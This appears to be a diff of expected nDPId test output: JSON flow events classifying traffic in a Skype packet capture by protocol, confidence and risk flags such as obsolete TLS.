+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970643964,"flow_last_seen":1431970644121,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 
+00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.138.161.88","src_port":13021,"dst_port":19521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970666902,"flow_last_seen":1431970694879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970666902,"flow_last_seen":1431970694879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634730,"flow_last_seen":1431970661287,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970634730,"flow_last_seen":1431970661287,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 
00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970657867,"flow_last_seen":1431970685617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51248,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970657867,"flow_last_seen":1431970685617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51248,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":199,"flow_first_seen":1431970682971,"flow_last_seen":1431970705724,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":77329,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51279,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970671951,"flow_last_seen":1431970689889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970671951,"flow_last_seen":1431970689889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":58061,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":58061,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970660159,"flow_last_seen":1431970690798,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":2462,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"108.160.163.108","dst_ip":"192.168.1.34","src_port":443,"dst_port":51222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970695865,"flow_last_seen":1431970707876,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51305,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970695865,"flow_last_seen":1431970707876,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51305,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1431970697478,"flow_last_seen":1431970707879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15769,"flow_avg_l4_payload_len":606,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1431970697478,"flow_last_seen":1431970707879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15769,"flow_avg_l4_payload_len":606,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51307,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970698661,"flow_last_seen":1431970706984,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970698661,"flow_last_seen":1431970706984,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1431970700273,"flow_last_seen":1431970706319,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":13978,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1431970700273,"flow_last_seen":1431970706319,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":13978,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970704329,"flow_last_seen":1431970708726,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970704329,"flow_last_seen":1431970708726,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970705942,"flow_last_seen":1431970706101,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4880,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970634669,"flow_last_seen":1431970634723,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":348,"flow_first_seen":1431970634729,"flow_last_seen":1431970685945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":158703,"flow_avg_l4_payload_len":456,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970634669,"flow_last_seen":1431970634723,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":348,"flow_first_seen":1431970634729,"flow_last_seen":1431970685945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":158703,"flow_avg_l4_payload_len":456,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970636340,"flow_last_seen":1431970655127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970636340,"flow_last_seen":1431970655127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970657448,"flow_last_seen":1431970689704,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":496,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970657448,"flow_last_seen":1431970689704,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":496,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970690133,"flow_last_seen":1431970690190,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970644120,"flow_last_seen":1431970644120,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970636301,"flow_last_seen":1431970662705,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.65","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970670304,"flow_last_seen":1431970696803,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55866,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 